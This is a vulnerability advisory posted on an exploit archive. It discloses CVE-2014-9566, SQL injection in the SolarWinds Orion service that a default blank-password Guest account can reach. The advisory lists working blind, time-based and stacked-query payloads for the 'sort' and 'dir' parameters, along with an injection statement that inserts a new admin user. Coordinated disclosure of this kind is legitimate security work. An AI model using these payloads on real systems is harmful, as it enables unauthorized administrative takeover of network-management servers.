exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Solarwinds Orion Service SQL Injection

Solarwinds Orion Service SQL Injection
Posted Mar 3, 2015
Authored by Brandon Perry

Various remote SQL injection vulnerabilities exist in the core Orion service used in most of the Solarwinds products. Affected products include Network Performance Monitor below version 11.5, NetFlow Traffic Analyzer below version 4.1, Network Configuration Manager below version 7.3.2, IP Address Manager below version 4.3, User Device Tracker below version 3.2, VoIP

tags | exploit, remote, web, vulnerability, sql injection
advisories | CVE-2014-9566
SHA-256 | 40f0cfd35789791a3221e29e1e315107c0ccf98e5d5f17f0defa24fafd955c3f

Solarwinds Orion Service SQL Injection

Change Mirror Download
I found a couple SQL injection vulnerabilities in the core Orion service
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
service provides a consistent configuration and authentication layer across
the products.

To be exact, the vulnerable applications and versions are:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

At first glance, the injections are only available to admins, as the
requests used are on the Manage Accounts page. However, it seems there is
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
AccountManagement.asmx service, which means that even authenticating as
Guest allows for exploitation. By default, the Guest account has no
password and is enabled.

On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
'dir' parameters are susceptible to boolean-/time-based, and stacked
injections. By capturing the AJAX requests made by an admin user to these
endpoints, authenticating as Guest and replacing the admin cookie with the
Guest cookie, you can still make a successful request, and thus a
successful exploitation vector for any authenticated user.

Being a stacked injection, this becomes a privilege escalation at the very
least, as an attacker is able to insert their own admin user. A pull
request for a Metasploit module which should achieve this on any product
using the Orion service as the core authentication management system, using
the GetAccounts endpoint, has been made (
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
module attempts to authenticate as the Guest user with a blank password,
then exploit the SQL injection to insert a new admin with a blank password.

I am not sure if the non-trial versions allow you to specify your own SQL
server, but the trials install a SQL Server Express instance. The SQL user
that the application uses is not an administrator, and the xp_cmd_shell
stored procedure is unavailable.

Within the GetAccounts endpoint:

Parameter: dir (GET)

Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC



Within the GetAccountGroups endpoint, very similar injection techniques are
available:

Parameter: dir (GET)

Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC


An example injection to insert an admin user named notadmin with a blank
password using the 'dir' parameter would be:

ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb 1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
Group Product Manager – Network Management at Solarwinds for the easy
coordination (you should still have a bug bounty though!).

i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?

i dub thee Molarfriends vulnerability. wheres my markketing tem...

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close